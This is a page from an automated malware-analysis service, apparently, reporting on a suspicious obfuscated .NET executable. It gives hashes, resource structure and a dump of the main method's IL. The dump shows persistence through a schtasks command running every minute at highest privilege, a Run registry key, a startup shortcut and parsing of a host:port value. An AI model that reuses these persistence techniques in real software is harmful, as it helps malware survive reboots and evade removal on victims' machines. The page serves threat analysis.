Suspicious
Suspect

0c51e804d39cf461ce04bbccfc31c0d4

PE Executable
|
MD5: 0c51e804d39cf461ce04bbccfc31c0d4
|
Size: 210.43 KB
|
application/x-dosexec

Print
Summary by MalvaGPT
Characteristics

Symbol Ofbuscation Score

Very high

Hash
 Hash Value
MD5
0c51e804d39cf461ce04bbccfc31c0d4
Sha1
a614a2c98a9a5eb79026fc6c58f7a712bd15b29a
Sha256
59910a60355e1679b31b2a17c4718d523edc7acaf1a0eb6d2d1f28834f0d043a
Sha384
a38f5a691e29eec75acb65e1d1c63dfc88b72cff0d6a481c94f89af0f1b4fe15f334ef0b49bdd432ed6c6627ee7441b2
Sha512
90f3c748d27e1ad214f50cd3adc0cb99631919d2b0075d9f06592925e4f6de529dfb72de65e7764ee1e02194af6c5ed5dc633f66016b8b249bc8ecf25be08c8f
SSDeep
3072:Csd3kr59D57aCB76Uxu2iMRvm2ODbX5YlHOjXK9O/HapEMql:7qB7XM+RObDb+lcKM/eEB
TLSH
0C2461909EEFCDCEC2AF763FA45A1D8258EED302074392E58B464E75B3815638D161E3
File Structure
0c51e804d39cf461ce04bbccfc31c0d4
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_ICON
ID:0001
ID:0
ID:0-preview.png
ID:0002
ID:0
ID:0003
ID:0
ID:0004
ID:0
ID:0005
ID:0
ID:0006
ID:0
ID:0007
ID:0
ID:0-preview.png
ID:0008
ID:0
ID:0009
ID:0
ID:000A
ID:0
ID:000B
ID:0
ID:000C
ID:0
RT_GROUP_CURSOR4
ID:0001
ID:0
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
Informations
Name
 Value
Module Name

DFIejfwfhnjvc.exe
Full Name

DFIejfwfhnjvc.exe
EntryPoint

System.Void Stub.bFbrunUZOUKCRnq::f0XW5uFo0ellEpW()
Scope Name

DFIejfwfhnjvc.exe
Scope Type

ModuleDef
Kind

Windows
Runtime Version

v4.0.30319
Tables Header Version

512
WinMD Version

<null>
Assembly Name

DFIejfwfhnjvc
Assembly Version

1.39.3323.1171
Assembly Culture

<null>
Has PublicKey

False
PublicKey Token

<null>
Target Framework

<null>
Total Strings

370
Main Method

System.Void Stub.bFbrunUZOUKCRnq::f0XW5uFo0ellEpW()
Main IL Instruction Count

352
Main IL

ldsfld System.Int32 6dc3e3j0JlzSncd::ToqXtmESAAD7kr5 ldc.i4 1000 mul.ovf <null> call System.Void System.Threading.Thread::Sleep(System.Int32) ldsfld System.String 6dc3e3j0JlzSncd::06e50rvH3jiAdf1 call System.Object Stub.7PKwXUnh9Hpnh3Pkjc::U0MtjIQhLp7fmhpsNj(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String 6dc3e3j0JlzSncd::06e50rvH3jiAdf1 ldsfld System.String 6dc3e3j0JlzSncd::7tb0uyrREClAKKr call System.Object Stub.7PKwXUnh9Hpnh3Pkjc::U0MtjIQhLp7fmhpsNj(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String 6dc3e3j0JlzSncd::7tb0uyrREClAKKr ldsfld System.String 6dc3e3j0JlzSncd::voLDlfCLmxCwVxQ call System.Object Stub.7PKwXUnh9Hpnh3Pkjc::U0MtjIQhLp7fmhpsNj(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String 6dc3e3j0JlzSncd::voLDlfCLmxCwVxQ ldsfld System.String 6dc3e3j0JlzSncd::gCjBmTybhmKy2qr call System.Object Stub.7PKwXUnh9Hpnh3Pkjc::U0MtjIQhLp7fmhpsNj(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String 6dc3e3j0JlzSncd::gCjBmTybhmKy2qr ldsfld System.String 6dc3e3j0JlzSncd::pq46ClMDLhUwGmL call System.Object Stub.7PKwXUnh9Hpnh3Pkjc::U0MtjIQhLp7fmhpsNj(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String 6dc3e3j0JlzSncd::pq46ClMDLhUwGmL ldsfld System.String 6dc3e3j0JlzSncd::RhLndJKGgcxsSil call System.Object Stub.7PKwXUnh9Hpnh3Pkjc::U0MtjIQhLp7fmhpsNj(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) call System.String System.Environment::ExpandEnvironmentVariables(System.String) stsfld System.String 6dc3e3j0JlzSncd::RhLndJKGgcxsSil ldsfld System.String 6dc3e3j0JlzSncd::2zUNneLrNmHAaW7 call System.Object Stub.7PKwXUnh9Hpnh3Pkjc::U0MtjIQhLp7fmhpsNj(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String 6dc3e3j0JlzSncd::2zUNneLrNmHAaW7 ldsfld System.String 6dc3e3j0JlzSncd::uzCfE14enlYAlmb call System.Object Stub.7PKwXUnh9Hpnh3Pkjc::U0MtjIQhLp7fmhpsNj(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String 6dc3e3j0JlzSncd::uzCfE14enlYAlmb ldsfld System.String 6dc3e3j0JlzSncd::P8sY7SvDAt6pg7p call System.Object Stub.7PKwXUnh9Hpnh3Pkjc::U0MtjIQhLp7fmhpsNj(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String 6dc3e3j0JlzSncd::P8sY7SvDAt6pg7p leave.s IL_00E0: call System.Boolean Stub.c3p7H33ISTPlp5PEh2::WqNM7jczVQM3QHTbEL() dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_4 ldc.i4.0 <null> call System.Void System.Environment::Exit(System.Int32) call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave.s IL_00E0: call System.Boolean Stub.c3p7H33ISTPlp5PEh2::WqNM7jczVQM3QHTbEL() call System.Boolean Stub.c3p7H33ISTPlp5PEh2::WqNM7jczVQM3QHTbEL() brtrue.s IL_00ED: call System.Void Stub.bFbrunUZOUKCRnq::B3iTkcLd8ThVWVJaqMlvaxXTLyoR4zFHpzYj5etyhQspBo8IDKzXMNRozdcf67wsWot3uS6tzmgWwsIos8UwWdxuSl() ldc.i4.0 <null> call System.Void System.Environment::Exit(System.Int32) call System.Void Stub.bFbrunUZOUKCRnq::B3iTkcLd8ThVWVJaqMlvaxXTLyoR4zFHpzYj5etyhQspBo8IDKzXMNRozdcf67wsWot3uS6tzmgWwsIos8UwWdxuSl() leave.s IL_0103: call System.Void Stub.bFbrunUZOUKCRnq::xj41ZwKUwBgF2j1xAWKaK34SxDGRpu0uX4wNGKhsBQOUPCBNO6wYCPJUOIbMG5omXqivklV6VGQXQH3SeIEKPgdKjr() dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_5 call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave.s IL_0103: call System.Void Stub.bFbrunUZOUKCRnq::xj41ZwKUwBgF2j1xAWKaK34SxDGRpu0uX4wNGKhsBQOUPCBNO6wYCPJUOIbMG5omXqivklV6VGQXQH3SeIEKPgdKjr() call System.Void Stub.bFbrunUZOUKCRnq::xj41ZwKUwBgF2j1xAWKaK34SxDGRpu0uX4wNGKhsBQOUPCBNO6wYCPJUOIbMG5omXqivklV6VGQXQH3SeIEKPgdKjr() ldsfld System.String 6dc3e3j0JlzSncd::RhLndJKGgcxsSil ldstr \ ldsfld System.String 6dc3e3j0JlzSncd::2zUNneLrNmHAaW7 call System.String System.String::Concat(System.String,System.String,System.String) stloc.1 <null> ldloc.1 <null> newobj System.Void System.IO.FileInfo::.ctor(System.String) callvirt System.IO.DirectoryInfo System.IO.FileInfo::get_Directory() callvirt System.String System.IO.DirectoryInfo::get_FullName() stloc.s V_6 ldloc.s V_6 call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) call System.Boolean System.IO.Directory::Exists(System.String) brtrue.s IL_014A: ldloc.1 ldloc.s V_6 call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) call System.IO.DirectoryInfo System.IO.Directory::CreateDirectory(System.String) pop <null> ldloc.1 <null> call System.Boolean System.IO.File::Exists(System.String) brfalse.s IL_0161: ldc.i4 1000 ldloc.1 <null> newobj System.Void System.IO.FileInfo::.ctor(System.String) stloc.s V_7 ldloc.s V_7 callvirt System.Void System.IO.FileInfo::Delete() ldc.i4 1000 call System.Void System.Threading.Thread::Sleep(System.Int32) ldloc.1 <null> ldsfld System.String Stub.c3p7H33ISTPlp5PEh2::wiNytaD3EFobPWtJIl call System.Byte[] System.IO.File::ReadAllBytes(System.String) call System.Void System.IO.File::WriteAllBytes(System.String,System.Byte[]) leave.s IL_018C: ldstr "schtasks.exe" dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_8 call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave.s IL_018C: ldstr "schtasks.exe" ldstr schtasks.exe newobj System.Void System.Diagnostics.ProcessStartInfo::.ctor(System.String) stloc.s V_10 ldloc.s V_10 ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_WindowStyle(System.Diagnostics.ProcessWindowStyle) call System.String Stub.qgBupFH6dv3w557RIhTFwEjCgudOywBiKYBG9tX8vIJXKr5FrIqibJlw6fZzeZpTc2XrRd9jSehMMd1uysuUlqDKEL::eW47GiwSVvekbMAMzTU35TOH0Jkb1Z7XEkvslm243O675F2rE07rBzYkhszAXPZR9QaISMdYv2fd4Qg8klYyjVWkFX() call System.Boolean Microsoft.VisualBasic.CompilerServices.Conversions::ToBoolean(System.String) brfalse.s IL_01F2: ldloc.s V_10 ldloc.s V_10 ldc.i4.5 <null> newarr System.String stloc.s V_15 ldloc.s V_15 ldc.i4.0 <null> ldstr /create /f /RL HIGHEST /sc minute /mo 1 /tn " stelem.ref <null> ldloc.s V_15 ldc.i4.1 <null> ldsfld System.String 6dc3e3j0JlzSncd::2zUNneLrNmHAaW7 call System.String System.IO.Path::GetFileNameWithoutExtension(System.String) stelem.ref <null> ldloc.s V_15 ldc.i4.2 <null> ldstr " /tr " stelem.ref <null> ldloc.s V_15 ldc.i4.3 <null> ldloc.1 <null> stelem.ref <null> ldloc.s V_15 ldc.i4.4 <null> ldstr " stelem.ref <null> ldloc.s V_15 call System.String System.String::Concat(System.String[]) callvirt System.Void System.Diagnostics.ProcessStartInfo::set_Arguments(System.String) br.s IL_0236: ldloc.s V_10 ldloc.s V_10 ldc.i4.5 <null> newarr System.String stloc.s V_15 ldloc.s V_15 ldc.i4.0 <null> ldstr /create /f /sc minute /mo 1 /tn " stelem.ref <null> ldloc.s V_15 ldc.i4.1 <null> ldsfld System.String 6dc3e3j0JlzSncd::2zUNneLrNmHAaW7 call System.String System.IO.Path::GetFileNameWithoutExtension(System.String) stelem.ref <null> ldloc.s V_15 ldc.i4.2 <null> ldstr " /tr " stelem.ref <null> ldloc.s V_15 ldc.i4.3 <null> ldloc.1 <null> stelem.ref <null> ldloc.s V_15 ldc.i4.4 <null> ldstr " stelem.ref <null> ldloc.s V_15 call System.String System.String::Concat(System.String[]) callvirt System.Void System.Diagnostics.ProcessStartInfo::set_Arguments(System.String) ldloc.s V_10 call System.Diagnostics.Process System.Diagnostics.Process::Start(System.Diagnostics.ProcessStartInfo) stloc.s V_9 ldloc.s V_9 callvirt System.Void System.Diagnostics.Process::WaitForExit() leave.s IL_0257: call My.2RLSdZBObhDOC76 My.3u9kjmGqItL31aJ::uiINPjI4DdrG6lS() dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_11 call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave.s IL_0257: call My.2RLSdZBObhDOC76 My.3u9kjmGqItL31aJ::uiINPjI4DdrG6lS() call My.2RLSdZBObhDOC76 My.3u9kjmGqItL31aJ::uiINPjI4DdrG6lS() callvirt Microsoft.VisualBasic.MyServices.RegistryProxy Microsoft.VisualBasic.Devices.ServerComputer::get_Registry() callvirt Microsoft.Win32.RegistryKey Microsoft.VisualBasic.MyServices.RegistryProxy::get_CurrentUser() ldstr SOFTWARE\Microsoft\Windows\CurrentVersion\Run ldc.i4.1 <null> callvirt Microsoft.Win32.RegistryKey Microsoft.Win32.RegistryKey::OpenSubKey(System.String,System.Boolean) ldsfld System.String 6dc3e3j0JlzSncd::2zUNneLrNmHAaW7 call System.String System.IO.Path::GetFileNameWithoutExtension(System.String) ldloc.1 <null> callvirt System.Void Microsoft.Win32.RegistryKey::SetValue(System.String,System.Object) leave.s IL_0292: ldc.i4.7 dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_12 call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave.s IL_0292: ldc.i4.7 ldc.i4.7 <null> call System.String System.Environment::GetFolderPath(System.Environment/SpecialFolder) ldstr \ ldsfld System.String 6dc3e3j0JlzSncd::2zUNneLrNmHAaW7 call System.String System.IO.Path::GetFileNameWithoutExtension(System.String) ldstr .lnk call System.String System.String::Concat(System.String,System.String,System.String,System.String) stloc.s V_13 ldstr WScript.Shell ldstr call System.Object Microsoft.VisualBasic.Interaction::CreateObject(System.String,System.String) ldnull <null> ldstr CreateShortcut ldc.i4.1 <null> newarr System.Object stloc.s V_16 ldloc.s V_16 ldc.i4.0 <null> ldloc.s V_13 stelem.ref <null> ldloc.s V_16 stloc.s V_17 ldloc.s V_17 ldnull <null> ldnull <null> ldc.i4.1 <null> newarr System.Boolean stloc.s V_18 ldloc.s V_18 ldc.i4.0 <null> ldc.i4.1 <null> stelem.i1 <null> ldloc.s V_18 call System.Object Microsoft.VisualBasic.CompilerServices.NewLateBinding::LateGet(System.Object,System.Type,System.String,System.Object[],System.String[],System.Type[],System.Boolean[]) ldloc.s V_18 ldc.i4.0 <null> ldelem.i1 <null> brfalse.s IL_0317: stloc.s V_19 ldloc.s V_17 ldc.i4.0 <null> ldelem.ref <null> call System.Object System.Runtime.CompilerServices.RuntimeHelpers::GetObjectValue(System.Object) ldtoken System.String call System.Type System.Type::GetTypeFromHandle(System.RuntimeTypeHandle) call System.Object Microsoft.VisualBasic.CompilerServices.Conversions::ChangeType(System.Object,System.Type) castclass System.String stloc.s V_13 stloc.s V_19 ldloc.s V_19 ldnull <null> ldstr TargetPath ldc.i4.1 <null> newarr System.Object stloc.s V_20 ldloc.s V_20 ldc.i4.0 <null> ldloc.1 <null> stelem.ref <null> ldloc.s V_20 ldnull <null> ldnull <null> ldc.i4.0 <null> ldc.i4.1 <null> call System.Void Microsoft.VisualBasic.CompilerServices.NewLateBinding::LateSetComplex(System.Object,System.Type,System.String,System.Object[],System.String[],System.Type[],System.Boolean,System.Boolean) ldloc.s V_19 ldnull <null> ldstr WorkingDirectory ldc.i4.1 <null> newarr System.Object stloc.s V_20 ldloc.s V_20 ldc.i4.0 <null> ldstr stelem.ref <null> ldloc.s V_20 ldnull <null> ldnull <null> ldc.i4.0 <null> ldc.i4.1 <null> call System.Void Microsoft.VisualBasic.CompilerServices.NewLateBinding::LateSetComplex(System.Object,System.Type,System.String,System.Object[],System.String[],System.Type[],System.Boolean,System.Boolean) ldloc.s V_19 ldnull <null> ldstr Save ldc.i4.0 <null> newarr System.Object ldnull <null> ldnull <null> ldnull <null> ldc.i4.1 <null> call System.Object Microsoft.VisualBasic.CompilerServices.NewLateBinding::LateCall(System.Object,System.Type,System.String,System.Object[],System.String[],System.Type[],System.Boolean[],System.Boolean) pop <null> ldnull <null> stloc.s V_19 ldloc.s V_13 ldc.i4.3 <null> newobj System.Void System.IO.FileStream::.ctor(System.String,System.IO.FileMode) stsfld System.IO.FileStream Stub.c3p7H33ISTPlp5PEh2::ikjXfwqoeeJeED98w0 leave.s IL_0396: ldsfld System.String 6dc3e3j0JlzSncd::pq46ClMDLhUwGmL dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_14 call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave.s IL_0396: ldsfld System.String 6dc3e3j0JlzSncd::pq46ClMDLhUwGmL ldsfld System.String 6dc3e3j0JlzSncd::pq46ClMDLhUwGmL call System.String Stub.bFbrunUZOUKCRnq::rSU0y1izFXFlyYU(System.String) stloc.0 <null> ldloc.0 <null> ldc.i4.1 <null> newarr System.Char stloc.s V_21 ldloc.s V_21 ldc.i4.0 <null> ldc.i4.s 58 stelem.i2 <null> ldloc.s V_21 callvirt System.String[] System.String::Split(System.Char[]) ldc.i4.0 <null> ldelem.ref <null> stsfld System.String 6dc3e3j0JlzSncd::jqgF1ytFzyIw9PW ldloc.0 <null> ldc.i4.1 <null> newarr System.Char stloc.s V_21 ldloc.s V_21 ldc.i4.0 <null> ldc.i4.s 58 stelem.i2 <null> ldloc.s V_21 callvirt System.String[] System.String::Split(System.Char[]) ldc.i4.1 <null> ldelem.ref <null> stsfld System.String 6dc3e3j0JlzSncd::alwXBvRZndBHonV call System.Void Stub.c3p7H33ISTPlp5PEh2::g2pZKM2xm2pn7Q94ud() ldnull <null> ldftn System.Void Stub.bFbrunUZOUKCRnq::wbHLMFaU80IM0uweMjnPThjdmvx9uLWCpW3Dupp0WrvhTRcDctKP6jYggTwmZS0TI7cRivGITfJtJvRyZsuWX345XS() newobj System.Void System.Threading.ThreadStart::.ctor(System.Object,System.IntPtr) newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) callvirt System.Void System.Threading.Thread::Start() call System.String Stub.qgBupFH6dv3w557RIhTFwEjCgudOywBiKYBG9tX8vIJXKr5FrIqibJlw6fZzeZpTc2XrRd9jSehMMd1uysuUlqDKEL::eW47GiwSVvekbMAMzTU35TOH0Jkb1Z7XEkvslm243O675F2rE07rBzYkhszAXPZR9QaISMdYv2fd4Qg8klYyjVWkFX() call System.Boolean Microsoft.VisualBasic.CompilerServices.Conversions::ToBoolean(System.String) brfalse.s IL_0407: call System.Void Stub.bFbrunUZOUKCRnq::kJ7g0KzDYXLFYGPzifSozT2QHIbuMeQNnsvhJgV0VkItsQdvCcZnNTYMxBe778cbVrEBWhIDVOo7zQTa9CUvMcTmLP() call System.Void Stub.36fd3U8dG0sI1QUwcZ::DdGkq3IuviCjXwF5tp() call System.Void Stub.bFbrunUZOUKCRnq::kJ7g0KzDYXLFYGPzifSozT2QHIbuMeQNnsvhJgV0VkItsQdvCcZnNTYMxBe778cbVrEBWhIDVOo7zQTa9CUvMcTmLP() ldnull <null> ldftn System.Void Stub.bFbrunUZOUKCRnq::T5Xtkv7GcO1MYmxZIWB5aDZ2KOWux9cvukulf2pkhzCOKdDz4q6LzeHbzOKEDb8hNJyjJjzDsM8uviHuMybqYReICX() newobj System.Void System.Threading.ThreadStart::.ctor(System.Object,System.IntPtr) newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) stloc.2 <null> ldnull <null> ldftn System.Void Stub.bFbrunUZOUKCRnq::aX5zV6jOW4wqCnAR4ysdVO6k2mz8W9N7VxFVF3IXx5j7ma6YAhNKDYgubsmanzBONSCDgkLfTTwaGefdjZzfg8kAaj() newobj System.Void System.Threading.ThreadStart::.ctor(System.Object,System.IntPtr) newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) stloc.3 <null> ldloc.2 <null> callvirt System.Void System.Threading.Thread::Start() ldloc.3 <null> callvirt System.Void System.Threading.Thread::Start() ldloc.3 <null> callvirt System.Void System.Threading.Thread::Join() ret <null>
0c51e804d39cf461ce04bbccfc31c0d4 (210.43 KB)
An error has occurred. This application may no longer respond until reloaded. Reload 🗙